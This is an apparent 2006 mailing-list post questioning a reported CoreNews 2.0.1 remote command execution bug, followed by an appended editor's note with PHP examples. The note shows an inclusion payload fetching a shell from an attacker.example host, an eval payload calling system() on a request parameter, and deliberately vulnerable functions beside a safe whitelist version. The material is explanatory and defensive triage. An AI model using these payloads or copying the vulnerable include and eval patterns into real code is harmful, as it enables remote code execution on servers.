[VIM] Oddness - CoreNews 2.0.1 Remote Command Execution

Steven M. Christey coley at mitre.org
Mon Mar 13 19:24:04 EST 2006


Ref:

  BUGTRAQ:20060309 CoreNews 2.0.1 Remote Command Exucetion
  http://www.securityfocus.com/archive/1/archive/1/427387/100/0/threaded

The researcher says:

>http://www.example.com/index.php?page=evilcode?&cmd=id

It's not clear whether this is a file include issue, an eval injection,
etc.  The demo URL is not specific enough.

Also, I downloaded the source code for CoreNews 2.0.1 from this site:

  http://www.php-spezial.de/start.php?go=top&id=&s=3

Doing a grep for "page" on the entire distribution does not return any
matches, except for unrelated example "homepage" URLs.

This is interesting, since it appears that this product is used by
some sites, and the page parameter is present and functioning.

Could this be a site-specific issue that is unrelated to CoreNews?  Or
maybe there's a modified version that's also called "2.0.1"?

Or maybe there's only so much you can see from a casual source
inspection :)

- Steve
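Editor's note (added example, not part of Steve's message and not CoreNews code): the post does not say which class of bug the demo URL exercises, so the snippet below illustrates the two hypotheses it names side by side. Everything here is hypothetical: the function names, the `.php` suffix, the attacker host and the page whitelist are assumptions chosen to show how a `?page=evilcode?&cmd=id` URL would be read under each hypothesis, not a description of CoreNews 2.0.1.

```php
<?php
// Hypothetical illustration, not CoreNews code.  Both functions take the
// same request shape as the demo URL: index.php?page=...&cmd=id

// Hypothesis 1: remote file inclusion.  If "page" is concatenated into an
// include() path and allow_url_include is on, a payload of the form
//   page=http://attacker.example/shell.txt?
// makes the trailing "?" swallow the appended ".php" as a query string, so
// PHP fetches and executes the attacker's file.  The "&cmd=id" half of the
// demo URL is then consumed by that remote file (classically a one-liner
// that passes $_GET['cmd'] to system()), not by the application itself.
function render_page_rfi(): void {
    $page = $_GET['page'] ?? 'news';   // assumed default
    include $page . '.php';            // vulnerable: unvalidated path
}

// Hypothesis 2: eval injection.  If "page" lands inside eval(), the payload
// would have to be PHP source that closes the string and runs code, e.g.
//   page=";system($_GET['cmd']);//
// The demo URL's trailing "?" is not needed for this class, which is one
// way a reader could try to tell the two apart from a fuller advisory.
function render_page_eval(): void {
    $page = $_GET['page'] ?? 'news';   // assumed default
    eval('$title = "' . $page . '";'); // vulnerable: attacker-controlled code
}

// Hardened form for either hypothesis: map the parameter onto a fixed set
// of local files and never let request data reach include() or eval().
function render_page_safe(): void {
    $allowed = [                       // assumed page table
        'news'    => 'news.php',
        'archive' => 'archive.php',
    ];
    $key = $_GET['page'] ?? 'news';
    if (!array_key_exists($key, $allowed)) {
        http_response_code(404);
        return;
    }
    include __DIR__ . '/pages/' . $allowed[$key];
}
```

When triaging a one-line demo URL like the one quoted above, the shape of the payload is the main clue: a URL or path fragment ending in `?` points at inclusion, while quote-and-semicolon PHP syntax points at eval; a source grep for the parameter name, as Steve did, settles it when the vendor's code actually contains the parameter.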

